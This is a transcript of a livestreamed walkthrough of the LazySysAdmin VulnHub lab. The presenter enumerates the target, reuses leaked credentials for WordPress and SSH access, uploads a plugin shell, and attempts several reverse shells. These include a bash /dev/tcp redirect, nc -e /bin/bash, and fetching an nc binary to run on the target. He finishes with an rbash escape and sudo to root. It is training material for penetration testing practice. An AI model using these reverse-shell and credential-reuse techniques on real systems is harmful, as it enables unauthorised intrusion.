All right, we should be good now. Hello, welcome. It is 5 o'clock. I don't think I'm actually late. It's actually 5. We're here. Sweet. I wanted to do something a little different today. It's been a long time since we've done a vulnhub. We've been kind of concentrating on hack the box lately, and so I was looking through some vulnhub stuff, see if there's anything interesting lately since the last time we did it, and I came across this LazySysAdmin, and somebody pointed out on Twitter, they're like, haven't we already done this box? We did a drunk web admin or drunk admin web hacking challenge, which was a lot of fun, but I don't think they're related. I think they're different ones. What caught my eye about this one is that this was created specifically out of somebody's experience failing the OSCP exam. I haven't messed with it yet, so I would imagine it's been up since September of 2017, that it's not violating any OSCP rules, but it's inspired by, and I know a lot of my viewers, are either OSCPs or OSCP hopefuls, and so it might be a fun box to kind of mess around with it. So it's some basics of Linux enumeration, and it might be a little beginner to intermediate, kind of gave me a pause, but if it gets a little too basic, we can dig into some rabbit holes and do some experimentation like we always do. So I'm not too worried about that. But anyways, this is the page for it. I highly recommend you go check it out and download it if you haven't already, to follow along or follow up later and do your own experimentation. But it really seems to just be about enumeration, and even the after the fact stuff is like, what can you do to do better enumeration, and what did you learn interesting, and what did you miss, etc. So and with that, we're just going to dive right in. So here's my Kali box. Totally changed the password. That's what I do. And here we are at my terminal screen. We already went ahead and set up a folder for us or directory for us to work out of. So that's all done. We're sitting in tmux, as you can see by the familiar green band at the bottom. And first things first, since we're not doing hack the box, we're going to need to find the box, right? But we haven't done this in a while, but there's a nifty tool we can use in Kali called netdiscover, and we will find out what our IP address is. And 192.168.47.0/24. And what netdiscover does is it basically sends out like broadcast packets, ping packets, and sees who responds to try and discover a full big net block all at once kind of thing. So it can take regular IP addresses, or with the R, it'll take a range, and we can give it CIDR notation here. So that's what we're doing. And after a few seconds, hopefully, yep, okay, cool. We're 160 and this is 162, so this is likely it because of how VMware hands out IP addresses. The other big hint here is that 000C is the MAC ID prefix for VMware. I guess 0050 is also used by VMware. That must be for like host adapters, because this is the gateway, and then this is like something else that it does, or maybe this is two gateways. I'm curious about this. We can look into it later. Oh my goodness, somebody has to go to college in 3 hours. Hopefully you woke up early to view this. I hope you're not killing yourself just to watch my streams, because it's really not worth it. You should be well rested for college. It's much more important than me. Trust me. Anyways, so we have a reasonable IP address here. We're going to close this because I don't actually like setting it up that way. Generally, those of you who know my stream, I like to set it up this way. There we go. So we're going to nmap as usual. We're going to nmap all ports 192.168.47.162. And we're going to output this to, we'll call this full TCP, because we're scanning all ports, and since we're leaving everything else default, we're gonna do a TCP scan, not a UDP scan. So if we have to scan later for UDP, we can change this to full UDP, and then we can tell the difference between our different scans. So we'll let that run. Whoa, that was super fast. Well, I guess we are on a local network. Okay, so we have SSH, we have HTTP, NetBIOS. This is probably Samba. We got MySQL running and IRC even, so that's a little interesting. So the next one we do here is we'll do a targeted port with our safe script. So we'll do 2280.139.445.3306 and 6667. We'll use the automated scripts there. We'll do the same IP address, 168.47.162. I saw somebody write a Python script that basically does this. It uses like masscan and then nmap to do basically the same process in one command. I've looked at it. It's an awesome script. I recommend using it. It's like called HTB scan or something like that. I want to write my own, so I'm probably going to write my own and then do a video on it, like how I did it and stuff like that. But that's why we're doing this step manually, and we'll just call this TCP scripts. And while that runs, let's see here. Would you please tell about your PC specs? Sure, I'll give a quick rundown. So I have 3 SSDs of various sizes. One's a boot drive, another one's for my games/VMs. Actually, 2 SSDs and a spinning disk, and the spinning disk is just storage, like music and videos and stuff. And then I've got a Core i7 6-core processor, I think, with 64 gigs of RAM and a GTX 1080 Ti graphics card. So, and then, network adapters and all that stuff, but none of that's important. Okay, so we've got quite a bit of script output, so we're going to scroll up a little bit. All right, we've got our TCP going on, or I'm sorry, SSH going on here. We can see the host keys, probably not important, but good to have. Agenda asks if I really need 64 gigs of RAM. So you don't see this, but you only usually see me having 1 or 2 VMs running at any given time. At one point when I was studying for the 660, I had all of the 660 SAN 660 VMs running at the same time, and then I also had and I guess I must have blown it away or I archived it or something, but I had a full AD, Active Directory lab set up as well. So, probably like 6 to 10 VMs running at any given time. And this just allows me, if I want to, just spin up a ton of VMs if I want, which I do occasionally when I'm really getting into my labs or something. But yeah, 64 gigs of RAM, it's awesome. I enjoy it a lot. Okay, getting back to things. We have a web server here that, let's see, we got robots.txt that'll be interesting to look at. Maybe this came out of that, the old test tr2 and backnode files, which should be interesting. So we'll check that out in a minute. We're going to, let's see. We got a work group out of it, so it's just using work group as the Samba work group. It looks like MySQL has authorization set up, which is, good for them, bad for us. And then we also have an IRC channel set up. There's 1 user in it, actually, so that's interesting. It'll be interesting to check out at some point. Maybe we can use a IRC client and check it, and maybe it's got some stuff going on in there. Again, the name of the game on this box is enumeration. So even if we get the flag or we get root or something, if we haven't kind of explored everything, then we'll dig into some stuff. Some host script results we can check out. The name of it is LazySysAdmin. Windows 6.1, which it likely isn't because I'm pretty sure it's a Linux VM. But it's Ubuntu Samba. It's guessing that by the SMB versions. Let's see. Samba 2. Okay, there's some interesting stuff. Maybe we can come up with some vulnerabilities on this stuff later, but it's not that big a deal. Let's catch up on chat. He's rich. No, I'm certainly not rich. I just spent a lot of money on my computers. And honestly, I built this computer probably 3 or 4 years ago now. I let computers run for, a while, and that's why I kind of spend a lot of money on them, and then they're good for a long time, and I don't have to keep upgrading. But yeah, the RAM itself was like $200, $300 maybe at the time. Let's see. You could spend more money on old whiskey. Yeah, I actually probably have spent a lot more money on booze since I bought this computer than I did on the computer itself. All right, so we got. So let's check out this web server. So we're gonna just minimize this for a sec. We'll get that going, and we'll get burp going. All right, next setup. We probably don't have a 192 rule set up in here. 186, nope. This is wrong. So let's grab, was it 47, right? 47160. So we'll just do this prefix, route that all through. I'm using Foxy Proxy for my rules here. We'll just modify this one so we don't get rule bloat. But Foxy Proxy allows me to set up dynamic rules on what is sent to the burp proxy and what isn't. So that browser check-in updates won't go through burp. Me Googling random stuff won't go through burp. Only the stuff going for the target computer goes that way. So we will turn intercept off so we don't go crazy. And it's about 162. All right, welcome to I don't care, powered by my tears. Cool. So we got it's called backnode. Something here, blah blah. We got a bunch of not links here, which is interesting, I guess. All right. Okay, not a lot there. That's okay. We have some, let's see. It's cat full, or not, sorry. TCP scripts, nmap. And there was these guys. So we'll just keep those up for now. And we'll check out, let's see. Is that gonna work? That's, I'm not sure how to interpret this. All right. Let's see, robots.txt. Oh, it's just /old. Why is that underscore there? Okay, nothing there. Test, nothing there. Do tr2. /tr2 was not found on the server. Okay, cool. Well, that's weird. Backnode files. Oh, that's neat. Yeah, it looks like we've got somebody spoiling all the stuff. That's cool. That's fine. We're gonna go through the steps anyways, because it's funner that way. So we've got a JSON script here, or JSON something, nothing. Various stuff. None of this looks interesting. None of this looks useful. Cool. All right. What about let's see. What about no, I know you're not spoiling it. I was joking. Just going through some of the stuff that we were doing at the time. I was just playing with you though. We'll still go through everything. I kind of want to check out this this IRC channel. So let's do a search IRC. Find an IRC client. Tiny IRC client. That sounds cool. Let's get that. Or do we have an IRC? Does Kali come with an IRC channel anymore? Nope. Weird. Back in my day, everything came with an IRC channel. Yeah, let's do this tiny IRC. Somebody's saying go old school and use NC. Yeah, back in my day we used Telnet. But yeah, NC is too fancy for the old school. I mean, so yeah, we could do it that way. Let's do 192 just to show how it works. 47.162. Yep. 62. Oh my gosh. I messed up, Johnny. All right. 162. Cool. And as let's see, full TCP and map grep IRC 6667. Let's see. Somebody asked what I studied. Yeah, so somebody asked what I studied. Which degree do I have? Yeah, I don't have a degree, actually. I never went to college. The how do I broach this? Stay in school. Definitely don't drop out. As far as between computer science and software engineering, I guess it depends. It depends on what programs they have. But I would probably go computer science because that's that's more about how computers work, and that's never really going to change. Software engineering, is going to change over time. Computer science itself, like the foundation, isn't. That being said, I've never been to university, so I maybe I'm wrong. Maybe I'm wrong there, but I don't know. I would say computer science, and then develop code on your way through school. I don't think you can get through computer science without doing that. Let's see. I need to do something to register, right? I need to pick a nick and all that stuff. IRC registration. It's /nick, I believe. It's nick serve bullshit, which I doubt it's running. Oh yeah, thanks, Daniel. Let's see, Nick Rook. User 8-star. Totally my real name. Definitely my real name. Is that gonna do it though? I feel like I should have gotten something out from the server. Ah, screw this. I have a client and everything. Nope. Ow, now. I ruined everything. All right. How do I do IRC again? It's been so long. No slash. They're only for the clients. Ah, that's a good point. All right, cool. Well, you learn something new every day. So we're gonna C2168 47162. I can totally type 6667. Not enough parameters. Oh, does there need to be a star here? Or a space here? Okay, there we go. If I recall correctly, there should be a channel command, like channels. List. The what? Only has one client from 0 servers. Cool. So all channels on the server of commerce separated. List channels is given or return channel topics. Server is given. The command will be forwarded to the server. Yeah, we don't need that. Channel user's name. List all channels. I thought when let's see, we call that TCP scripts and map. See, it already had a user, but no channel. Okay, how do we list users? Let's see here. Not sure that's what I was looking for. Or is it just this? Is it just like serve? It's just nick serve that's going on here? You guys are watching me stumble through my like teen years here. It's been a while since it's been a while since I was a teen, so you're gonna have to bear with me. Okay. Well, we're not finding anything here. We'll kind of shelve this and come back to it if need be. Oh, come on. There we go. We'll come back to this if we need to enumerate some more. Let's do the Samba servers now. So we're going to do enum for Linux. And for those of you who have not used enum for Linux before, this is basically a Samba enumeration tool for Linux. There are Windows versions, etc. First, we're just going to get a share list, I think, because if you run this -a, it's going to do a ton of enumeration. And we don't need to do all that right now. If we need to, then maybe we will later. But right now, let's just get a share list. You know what? Let's do A. The point of this whole exercise is to do enumeration, right? So we will do enumeration. So we'll do this and then not 1010. It's my hack the box showing 47.192. Is there like an output? So all this does is we want to see it come out to we want to see the output come to standard out, but we also want it to go to enum.out so that we can view this later if we need to. If we would have just redirected with the like arrow key, it would have just gone to the file and we would have had to cat it later. So couldn't find workgroup domain, use the uninitialized global workgroup. Interesting. Really? That's, oh, it's not 192. See, this is what you guys are supposed to be here. You guys are supposed to be here to help me with this stuff. Oh my goodness. And that's why we need output to a file so that we can see this later. It looks like we're able to do null sessions on this as well. All right, that came back. Let's see. I think Nmap only showed a user because it connected itself to check. I think that's valid. I think you're right. And then asked to do another video on a hacking process. Those are in the works. The next one's exploiting, and so there's a lot of stuff that I have to do there. I have to get the systems that I want to exploit set up so that I can like show the exploiting techniques and then actually run the exploit. I won't be doing exploit dev, but I'll be doing, you know, like downloading stuff from exploit DB and modifying them and stuff. But I need to show it working, so there's a lot of work for the next process video. All right. Let's just move up. Actually, let's do this in less. Less enum.out. What do we got here? Here's the host name and the work group. We got, there's no domain because it's just a work group. We got the various OS versions. Here's some shares. Let's see. Well, we can check those shares out in a minute. We got some password policy stuff, which is useful if we're trying to do some like Hydra or something like that, which we won't be, but group memberships, nothing. Here it starts trying to do the user enumeration, and it's doing it from a null session using no password or username or password, which should be disabled in modern operating systems, but I still see it a lot in engagements. Let's see. We've got built-in. Is this not Windows? Or is this Windows? No, it's Ubuntu. Did they just do all this? Or is this is probably default to Samba? Like Samba might set all that up. We got a Unix user of Togi or Toji, possibly. There's a nobody user as usual. Okay, cool. Let's grab these default shares. Grab these default shares here. We'll just VI shares. Cool. And we'll use SMB client to connect to them. So SMB client. Oop, gotta spell that right. And 192.168.47.162, not 92. Or what are we doing? We should really just mount this, shouldn't we? We would probably just mount this instead of doing this all weird. But maybe U, P, is it P? Yeah. Or I guess we can just do -n for no pass. Port of 445. Is there not a share? Oop. SMB from Linux. CLI. Dude, Hassan, go to sleep. You need to be fresh for college tomorrow. Oh, mine is L as the host. Um, 2168.47.162. Whoop. U, no pass. Wait. Um, 92.168.47.162. Let's do share, I guess. U Bad network name. It wasn't a bad network name. It's a thing right here. Loser. I'm wondering why this isn't working. Nope. Let's try SMB mount then. Actually, we won't do that. We'll make a mount here. Make their mount. Make their mount share. IPC and was it admin, I think? Okay. And we're gonna SMB mount. Why would this lie to me about an SMB mount command? You're the worst. It might be an old, probably an old article here. Sometimes that stuff changes, sometimes not. Yeah, this is what I was talking about earlier. It's just mounting the drive. I don't know if it'll allow null sessions though, which is the only thing. The other thing is we could just do this, right? Probably. We just did like SMB 68 47 162 share. Will it not? What? It won't let us do like a won't let us do a null session. Hmm. Oh, it's print, not admin. I was doing share though, right? Oh, and it's also a $. There we go. Okay. It was missing the $, which, is clearly visible in my notes that I should have been referring to. Cool. So we've got all kinds of stuff here. There's a /WP, which is empty. There's a WordPress that is not empty. So if we go back here, there is a WordPress here. So if we would have ran like dir search or GoBuster or anything like that, we would have found it. We haven't gotten there yet. Oh, the TR2, they must have moved it from TR2 to WordPress, or not moved it to TR2 to WordPress, or not moved it from WordPress to TR2 yet, or something happened. But yeah, so here's a WordPress site. A GoBuster would have found this eventually. We've got all kinds of stuff in here. So let's go ahead and we can do a WP scan. I think it's -O, or is it -- output maybe? I know there's a way to output. Maybe not. Okay, so we'll WP scan. We'll -EAP because we're doing, we're doing full enumeration here, and we'll do the host -U of HTTP 192.168.47.162/WordPress, and we'll just tee this to WP scan.out as well. Come on, man. Oh, does it not work with the redirects? Oh, yeah. Somebody mentioned, Daniel mentioned -- no color because it's gonna give us a bunch of coloration there. But WP scan should be running anyways. What's happening here? Oh. Yeah, we'll just run this. Let's see, what are we seeing here? There's a README file that gives us the version number. Cool. Interesting header is not interesting. Actually, that is kind of interesting. It's very interesting. We got now the server, if we didn't already know what server version and what host OS we were running, that would be good. Registration is enabled, so if we find something authenticated, we can register to be able to pull off authenticated attacks if need be. The XML RPC is available, which if it's a vulnerable version, can do all kinds of crazy stuff with that. We've got an upload directory, which is super interesting. Directory listing enabled for this, for the WP includes. The theme is out of date. Let's see. Enumerating all plugins. They found a Kismet, which this is a like a security plugin to do some hardening, and I think it's like comment, like spam prevention stuff, if I recall correctly. So no plugins there, but maybe we can find some logins, admin logins, and if we can find an admin login, since we have the all of the files that we need, all of the files here, we can go into WordPress and just see all of the files, right? So if we can find the login credentials, which are actually in the database, not in the files, but we have access to the database to log into the database. So if we can get admin access, we can upload our own PHP shell or our own WordPress plugin shell and get a shell back that way. So that's very interesting too. We'll actually, let's run that down. Let's get a like a WordPad, like a notepad going here. Vector notes. And so we'll do WordPress admin shell, and we'll get that through connect to SMB shared $. Null. V creds from then dump WordPress creds upload shell plugin. Cool. The other thing is, possibly from this connect to DB, if we connect to the DB, we might be able to shell out from the DB itself. So shell out from database using bin bash or something like that. So there's two ways that you can do it. You can either run this. If it allows you to run commands, you can use the exclamation point to run shell commands directly from MySQL, and then you can bin bash out of it, depending if they're set up to allow you to do that. I believe you have to explicitly lower your security settings to be able to do that, but hey, maybe they can do that. Maybe they do that. They're weird. So that's one way to shell out from the database. The other thing is if you have like file system write, shell to disk. So if you have the certain write commands within SQL, you can write data directly to the disk. And then if you have a local file include, then through the web server or something like that, then you can get it to run. Or since we know exactly where this stuff is, we can write it to here and then just load it up through the WordPress site. So we can write shell to disk from the database and shell out that way, possibly. So we'll write this for now, and we'll see if we can shell out using the WordPress. So we're going to check out the config. We'll open it with the text editor. WordPress admin, and we got this guy's password here. So let's see if we can MySQL, SQL help. Okay. MySQL CLI connect to remote host. I always forget the syntax of all this crap. Username, password, H is the remote host. Oh, of course. So we do MySQL, SQL U admin P. There's his password. H evidently is the remote host, so 192.168.47.162. Port 3306. Is there something else there? DB name. We can, oh, we know the DB name. DB name is WordPress. Whoop. Why? It's saying that it's wrong. MySQL options. Oh, I don't actually have a, like, I'm doing the port there. There we go. Oh, cool. So they have some stuff head up. Okay, so in the configs, you can actually set up to who you want to allow connections from. So that's cool. You absolutely should be doing this for your databases. You should only let trusted hosts or hosts that you know will be connecting to your database, that you know should be connecting to your database. You should only allow them to access. Now, additionally, what it should be doing is that it should not be presenting 3306 to the network is the next thing it shouldn't be doing, unless it really has to. But then if it really has to, then maybe you can even set up like IP tables, so it's only shown as open to the specific host that should be accessing it as well. Either of those should work. So once we get access to the server, once we get a shell on that server, we can connect to it, and maybe we can do a privesc through that or something. So let's see here. We'll just make a note that say MySQL not reachable from 192.168.47.160. Cool. I mean, that's good. We want to see stuff like that. Pen testing, you sometimes get discouraged, or you're like, oh man, like that sucks that we ran into this. This is good. We want to see our clients and our customers doing things correctly for two reasons. One, it means that they're not like hopeless on security, right? They're doing some things right, and then that means they're much more receptive to our remediation suggestions for other things. Call stuff like this out in your reports. Don't just give the bad news in the reports, give good news, what they're doing correctly as well in the reports. The other reason why this is really good for us is because you don't want to be finding the same vulns over and over and over and over. It'll get boring. We're not in this line of work so that we can do the same thing over and over and over again. We want to start doing newer and more challenging stuff. So if they're doing stuff correctly, if they're learning, if they're growing, then that's good for us. We get to do more exciting stuff later. So anyways, this isn't the end of the world when we see stuff like this. It's good. We want to see stuff like this. Okay, so these two things are out currently, which is fine. But we can check that stuff out later, like once we actually get connection. So let's move. Let me clean up my search history here. Let's keep going through the files here. We have a to-do list. We have some deets. There's our robot.txt. We've seen this before. This thing led us astray, which is unfortunate. That's fine. All right, CVF, remembering all these passwords. Remember to remove this file and update your password after we push out the server. You probably should have done that sooner. Cool. We'll just note this. So found password in deets.txt 1, 2, 3, 4, 5. Oh. Likely, was it Toji, right? We found a user here. Where was the user? Did I skip past it? Yeah, Toji, T-O-G-I-E. There we go. So maybe SSH question mark or WordPress even. Let's try that. So WP login. Whoop. .php. I always forget. Oh yeah, here we go. So Toji. Nope. The other thing is we found creds. Oh, we didn't actually put the creds here. We should have. Let's keep our notes useful, right? Let's go back into WordPress here and get our WP config. And the other thing is password reuse, right? Is a thing that exists. So maybe this will log us into WordPress. Oh, look at that. So here's another thing. As you find creds, use them places. Use them places. This happens all the time in CTFs and pen test engagements and everything. When you find creds, use them places. This is very much the MySQL password. If you notice, there's also the 1, 2, 3, 4, 5. So they're definitely reusing at least parts of stuff. But this is also the WordPress. So we can actually upload. Oh yeah, because it's anti-spam. We can actually upload a shell here. So if we let's see if we do WordPress, and there's a Metasploit module for this. I'll just show you real quick. But since we're doing this, since it's like an OSCP thing, we're not going to use Metasploit to actually do any exploitation. But I'll just show you how to find that. WordPress plugin reverse shell. Let's see. So we'll search WordPress. Oh my God. Is it seriously this easy? Oh. It looks like this guy literally just took the WordPress plugin that I'm about to show you here. And let's compare. We'll compare. Admin. Okay. WP admin shell upload. So we'll use this. And we'll run info. This module will generate a plugin, pack the payload into it, and upload it to a server running WordPress, providing valid admin credentials are used. Cool. And as Rob Carr is the person who made it, and this guy is giving, this person is giving credit to Rob Carr, so that's awesome. Listening address and listening port. You are also given the option to start a handler. I recommend that you do. Since by default the plugin will be made using PHP interpreter. So you can't use this right off the bat on the OSCP anymore. When I took OSCP, you could use Meterpreter. Evidently, you can't anymore, and I heard that secondhand, so I'm not entirely sure. But I have heard from a couple different sources that you can't use Meterpreter. So don't use this. Always read before you use exploits. Let's see, if you have your own nefarious PHP payload, simply adjust the script to accept it. So we can probably do this. Let's check out his code real quick. Their code, I keep saying. So here it's actually generating it. Is it going to call MSF enum? It is. Generate plugin script. It does random. It does a random number for its versioning. Open QWERTY rocks. Write the plugin script to it. Let's see. So yeah, it runs MSF enum on the system. So we can just change this to whatever we want to not be Meterpreter, which is cool. And it runs, oh yeah, it'll run the multi-handler for you and everything. Wow, this is neat. Cool. Someone says, Daniel says, Meterpreter usage is restricted the same way Metasploit usage is, meaning you can use Meterpreter and Metasploit as a whole on one approved specified Metasploit machine during the exam. Yeah. So you can, it's restricted. But when I took the OSCP, Meterpreter was not restricted. You could use the Meterpreter payload whenever you wanted. Even on machines that you didn't choose to use Metasploit with. So that's the clarification that I was trying to make. But it looks like here it's just a simple string that you change on which shell you want to use or which payload you want to use. So you can use non-Meterpreter probably. Search payloads PHP. So we can download, we can just exec if we want. They have a reverse PHP shell. You can do a bunch of stuff. What does the PHP exec do? Nope. Oh, it just execs a command? Oh, that's unfortunate. Yeah, interesting. Let's see, there's a bunch more stuff here. So, yeah, you can, okay, so Medic says you can use the multi-handler as much as you want. That's absolutely correct. You can use multi-handler at all, like anytime you want, but you can't use Meterpreter as the payload to connect to that multi-handler except on one box that you designate. And mind you, it's been, let's see, 2+ years, like two and some change years since I've done the OSCP. So take what I remember as a grain of salt, because it's probably changed. Of course, always check the rules and regulations before you take the test. Excuse me while I open the window real quick. It's getting hot in here. And I do not, none of you want me to take off all my clothes. So let's lower the temperature a little bit. It's an old song reference. Some of you kids probably don't get it. All right. Cool. So anyway, so this is a weird thing. So we're going to, let's just grab like any WordPress shell. Quick and dirty. That seems like a long way to go about just getting a single command going. Yes, it's Nelly Hot and Her. I mean, early 2000s for some of these people is probably pretty old for a song like that. but a lot of them were listening to Barney or something, whatever early 2000s version of Barney was. And this can work. All right. Cool. We'll just upload this then. Plugins. Add new. We have to zip it. What is it like? Just gonna zip the WordPress shell, right? What are the things in shell.php? I don't understand here. I just put this here, right? So just zip, and then the shell.php, and it doesn't want to do that? Why doesn't it want to do that? Missing end signature. Probably not a zip file. What? I don't want to unzip it, idiot. Let's see. Oh, I have to tell it what it's called first? Oh. Cool. Browse. Install, bro. Cheap and nasty word shell. I like it. Cool. So here's what we're going to do. This got changed. So db creds reused. All right, cool. Notes are updated. Curl, boom. Now, if we do this, do F3. Now, what happens if we there is no NC traditional. Okay, well, we can do the bash one, I guess. What? Okay, somebody, Daniel asks, what is the uname-a? Later on, LES could get you root, so you could check /root. Yeah, we can run uname-a. Why not? Oop. There. It's 4.4. It's actually pretty new. That's surprising. Somebody says wrong link for shell, by the way. Is it? I thought that was the shell that we used. Oh no, that's word for own. You're right. That is the wrong link. There we go. I appreciate that. There we go. Cool. Daniel, that's exactly the bash thing that I was talking about. So that is our next step. Dev TCP 192.168.47.160/443. Still wrong. Wait, oh, did I copy the wrong thing? Oh my god, it is still wrong. Jesus. Here we go. That's what I was looking for. Thank you. I don't know how many of you actually follow me on Twitter, but if you notice the giant Manhattan that I made for myself earlier, I'm about halfway through it. So if I get some typos, please, or, you know, just copying and pasting the wrong command over and over and over again, please bear with me. Okay, so this should work. Let's see. We're running bash in an interactive mode, and we're shoveling the standard into dev TCP 192.168.47.160 and port 443, and also redirecting the output into the standard out. What that basically means is that it's going to shovel a bin bash shell to us through this dev TCP file system. If you're not fully aware that everything in Linux is a file, everything in Linux is a file, including network sockets. Now, this is a kernel compilation option. This doesn't exist on every Linux. It is common, but for instance, if you have like a hardened kernel or a hardened kernel install at work or something, this might not work for you. But it is it's very useful if it is available. Okay, we're going to go ahead and run this and see if it works. It did not. Let's see here. Oh, it's a bash only thing. It's not a, sorry. But it's a compilation option, I believe. Daniel says it's not a kernel option. It's a bash thing. But it's a compilation option, correct, Daniel? Okay, so that works. It must not be working on that end. Another thing that I've seen, let's do this. Another thing that I've seen is first of all, let's try getting rid of all these control characters. The single quote should let it work. Okay, so Daniel says you have to listen on Netcat. I was originally, but when I tested it locally, that took up the Netcat and closed it. So I am listening again. I appreciate you pointing that out. Somebody said, can you echo the command to see if it's translating correctly? I don't think we should need to even have those encoded characters since I'm single quoting the whole thing. Whoop. Okay, a couple things came up in chat. So someone is asking why we're not using NC-E. That's because NC-E is not a default use of NC. It's generally enabled in nc.traditional, which doesn't exist on the host, but we can check out and see if it works. Which NC has been NC, right? Okay, hold on. Now I'm having issues. Did I? Okay. So we'll do NC %20 minus H. Doesn't have any help. Nope. Weird. All right, let's do this. The other thing is somebody said Google URL encoders. I use ASCII to hex because it's just got a bunch of different encoding and conversion options just all over the place. So I'm going to do bin bash minus I. Oh. Nope, still not working. Okay. Let's see. Well, we can do something else. Let's see here. We can. I mean, we can get it to wget another shell. Who are we running as again? Oh, we're running as dub. Maybe we can exploit the Hello Dolly plugin. Yeah, that's not happening. Somebody did mention possibly doing another command or another port, maybe. They mentioned that 443 would have failed if something else was listening there. NC wouldn't have been able to listen if something else were listening there. So we can do this. Grep 443. And if you notice, let's do grep listen. Grep listen. And you can see that we're not listening on 443 at all. Netcat wouldn't have been able to bind. However, it's possible that it's not, the target isn't allowed to get out on 443. So we can change this to 80 just to try it. Nope, still not working. It's probably not going to work. Whatever. We can do some other stuff. Rewrite the 404 error page. That could work too. I mean, we have full control. Do we have right to this? I mean, like, can we just move files here? Because if we can, then, like, I don't know what the hell we're doing. We can't write. Okay, it's read only. That's fair. But can we upload NC? We can get it. Yeah, we could do that. We could absolutely do that. Let's do this. Find name nc.traditional. What? bin nc traditional. So if we just copy bin nc.traditional here, and we'll python 3m http.server on 80, and we will, instead of all this junk, we'll just get wget %20 6847.160 / nc.traditional. Cool. So now, instead of this, we'll just temp nc.traditional minus e bin bash. Nope. It still doesn't like it still doesn't like the oh yeah, it totally does need you're right. 20 e %20 bin bash %20 2168 .47.160 %20 443. I don't think it likes the God damn it. I don't think it likes reverse shells. Here's what I am going to do. Let's do this. Just because I'm curious if we're getting like stonewalled by these. Cool. IP tables. Restricted cannot specify. Oh, wait, what? I'm in R bash? That's crazy. Ugh. Oh man, I so don't want to deal with this. Okay. I was hoping this would be a quick thing to see if, well, let's do this. Oh, it's not Cypher. How do you do the command? Oh, it's just, it's not. That's funny. Okay, give me a second. I know that I kind of went really fast there for a second, but give me a second and I'll explain what the hell I just did. What? Oh. I started to do chown, and then I did the chmod thing. There we go. Exec format. Oh yeah, it must be dynamically linked. Okay, let's take a second and talk about what the hell I just did. So we used these credentials that we found earlier that we guessed correctly that were tied to SSH. So we will update our notes here. Okay, so we guessed correctly that they were SSH. When we logged in, where did we initially log in? Cool. When we logged in, we got this thing saying R bash temp NC traditional restricted cannot specify / in command names. R bash is restricted bash. That's a restricted shell that exists to kind of limit users into only being able to do certain things when they log in. It's like a way to allow people log into your system without giving them kind of run of the system. you can lock it down to not allow slashes so that they can't run commands outside of their environment. You can specify specific paths that they're allowed to run from and run through and stuff like that. A common problem with it, though, is that SSH will execute commands before rbash loads. So when you do something like what I was trying to do here, which won't work, when you do this, which is basically SSH user at blah, and then you tell it to run a command afterwards, that command will execute before bashrc or anything like that loads, and it's probably the bashrc or the profile that's actually loading the rbash stuff. So if we look here, if we go back to their area, so we'll cat bashrc. Okay, it doesn't be, it seemed to be here, cat.profile. Are we setting it in Etsy password? Yeah, okay, we're setting it in Etsy password. Interesting. Because we're not logging in as an interactive user, maybe it doesn't do that. That's super strange. Anyways, we should just be able to run bash here. Nope. Weird. Oh well. We can do some other funky stuff. I've never actually seen this have problems like this before. Bin bash. We do have a path. Weird. We do I've never seen it do that before. Huh. Cool. Well, we can just do a like import pty. If you've seen my streams before, you've seen this happen before. But this is a way to upgrade your session. And then you can actually even background this. And if you do a stty, what is it? Raw minus echo. Shit. The term is screen. I don't think that's actually what we wanted. Okay, now we have the tab complete and everything. So yeah, so we turned echo off on the previous thing, and now if you notice, you probably didn't notice actually, this probably didn't happen before. Yeah, we weren't getting the echo for some reason, but we were able to, now we have full, up, down history. We were able to tab complete stuff. If I control C out of something, it doesn't control C out of everything. This is usually used for like netcat shells and whatnot, Python shells. I've never had to use it for an rbash escape, but here we are. It's a thing. It's a thing that exists, I guess. Anyways, we can do stuff like sudo -l and 1, 2, 3, 4, 5. Oh my goodness, he has everything. Okay. Has full sudo root. Cool. We're going to go ahead and take this sudo, and we're going to iptables L. Why is that other stuff not working then? Oh, because NC traditional wasn't working. Why is bash not working? Bash, let's see. NC NLVP 80. If we do bash I, and one, thank you. Dev TCP 192.168.47.160. Then let's see, 80, and then 0 to 1, right? It's got to be and 1 again, I think. Yeah. That's a file or directory. Yeah. So the dev TCP is not working here. Dev TCP is not a thing that's enabled on this system. So we could let's see. We'll find iname and nc.traditional. We should have statically linked stuff here. Nope, we don't have a statically linked NC traditional. (64-bit). That's 32-bit. Let's see. Whoop. -E? Cool. All right. So that's what we'll do. We'll so now we have this 32-bit one. We'll go ahead and exit out of this because we got root through a certain way. So we've got indeets.txt, and actually really it should be connected to share $sign with null session. Okay, found password deets, likely togi, SSH creds, has full sudo, root. Okay, that's a path to root that we found. Nah. I'm gonna just kill that pane. Okay. Now we will, let's see, HTTP, sorry, Python 3c http.server on port 80. Excuse you. HTTP not defined. what? Oh, not C, M. Then we're going to cat our vector notes. Use this curl. Instead, we're going to wget %20 http://192.168 47.160/NC and %20 minus capital O %20/temp NC. Okay, then we're going to chmod %20 plus x %20 temp NC. Then we should be able to /temp NC %20 minus E 20 bin bash %20 192.168.47.160 %20 and C NLVP 443. No! So we will %20 2 into and 1 and 1. It's not giving us actual output. Two 1 6 8 27 or 47 162 1 2 3 4 5. Whoop. Why didn't it plus exit? Chmod plus x temp NC. Which chmod? Okay, we can just 777. Okay. Hey, there we go. Okay, so what we would have needed to have done, let's see. What we would have needed to have done is we can do this. Six NC binary. Then we need to actually do the chmod 777 instead of doing the plus X for some reason. Not really sure why there, but you know, whatever. And then we can do the curl on it and get the shellback. Okay, and then this is generally when you do the, so we can run an ID and we're dub. This is generally when you do the Python C import P2Y pty.spawn bin bash. Then we get our stuff here. This is you know, you can't do up down, you can't do pwd tab or anything like that, or pwd tab or anything like that. And that's when we do the control Z, you know, the stty raw minus echo, all that shit to get going. Here, I'm not sure if we'd look at I'm not sure if we'd look at privesc opportunities from here, since we have this. We already got a password leak from the from deets here, so we don't really need to get a privesc from www data to the togi or toji. What we would do is we would use this shell to su to toji, like if SSH wasn't activated or something like that. Let's catch up on some. Oh man, I haven't checked chat in forever. Hold on. Okay. Unrelated to this, but it's kind of funny. I had to escape Vim in the CTF a few months ago. NCN, and you get smacked with Vim. It ran Vim whenever you exited it and reran. Oh man, yeah. So there's actually an escape for Vim. You can run like shell commands from Vim, which is a great privesc method, or rbash escape. Like if rbash only lets you run Vim, then you can rbash, or you can Vim out, shell out of Vim to get rbash, to get out of rbash too. But I see a lot of sudoers that restrict you to like Vim, like you can only Vim certain files, and then escaping out of Vim is a great way to do it. And the way you do it is, so I'm in Vim right now, actually, on my host system, right? You can do this basically. And now I'm in bash, and it looks the same because, you know, this is my normal terminal, right? But if I if I exit out of it, then I go right back into Vim here. So it's this is super useful. I see this a lot in CTFs. A lot of times, like, this is useful for if you're writing Python or you're writing scripts or something and you want to test it. You can do this exclamation point and run the command, and, you know, see the output, and then go right back into 